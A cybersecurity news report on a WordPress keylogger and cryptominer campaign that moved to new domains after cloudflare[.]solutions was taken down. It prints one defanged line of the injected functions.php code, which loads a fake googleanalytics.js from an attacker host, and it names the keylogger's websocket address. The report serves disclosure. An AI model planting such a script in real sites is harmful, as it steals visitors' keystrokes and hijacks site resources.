A WordPress keylogger that already spreading via Cloudflare.solutions has changed now and it returns via new domains that affected more than 1000 of WordPress websites.
Last year This WordPress keylogger has been discovered in Cloudflare[.]solutions and the domain was completely taken down but attackers now registered a new domains.
There are three new domains were identified cdjs[.]online , cdns[.]ws, msdns[.]online and these 3 Malicious domains are responsible for injecting Keylogger into thousands of websites.
According to Sucuri, 129 websites for cdns[.]ws and 103 websites for cdjs[.]online, but it’s likely that the majority of the websites have not been indexed yet. Since mid-December, msdns[.]online has infected over a thousand websites.
Also Read Malware Abuse Google Ads to Injecting Coinhive Cryptocurrency Miner
Attackers are using many malicious scripts that injected into targeting WordPress websites Database directly and compromise it.
The cdjs[.]online based Script injected into WordPress database file called wp_posts table or themes functions.php file and also other 2 scripts also injected into this file.
function chmnr_klgr_enqueue_script() { wp_enqueue_script( 'chmnr_klgr-js', 'hxxps://cdns[.]ws/lib/googleanalytics.js', false );
cdjs[.]online also performing to inject 3 obfuscated fake googleanalytics.js same as the previous version of the campaign.
Also, Researchers found that fake jQuery has been used for injecting the encrypted CoinHive crypto mining in the targeted website.
Last year cloudflare[.]solutions was injected the /lib/kl.js script as a keylogger and the site was taken down later.
Accorinding to Securi, The only changes are the socketURL address, which now decodes to “wss://cdjs[.]online:8085/” (instead of wss://cloudflare[.]solutions:8085) and the red herring part of the linterkeys variables changed from “https://cdnjs.cloudflare.com/ajax/libs/linter/linter.js” to a more neutral “https://js.io/query”.
The keylogger will behave the same way in Newly infected website as previous campaigns that is displaying unwanted banners at the bottom of the page which appears 15 seconds after browsing the website due to injecting the Cloudflare[.]solutions Scripts in function.php.
msdns[.]online Malicious Domain can perform as a crypto miners and keylogger also it located in the same server as cdns[.]ws.
Securi has identified that this new attack is utilizing the following 3 servers:
Cybersecurity researchers have uncovered a critical flaw in the content moderation systems of AI models…
Microsoft’s cybersecurity research team has issued a stark warning about the risks of using default…
A high-profile Russian Instagram blogger recently fell victim to a sophisticated cyberattack, where scammers hijacked…
The food and agriculture industry is facing an unprecedented wave of cybersecurity threats in 2025,…
Microsoft announced a major update aimed at bolstering the cybersecurity of its flagship AI-powered productivity…
A major cyberattack on the Coweta County School System's computer network occurred late Friday night, which is a worrying development for New Mexico's educational institutions. The unauthorized intrusion, detected around 7:00 p.m., prompted immediate action from the school…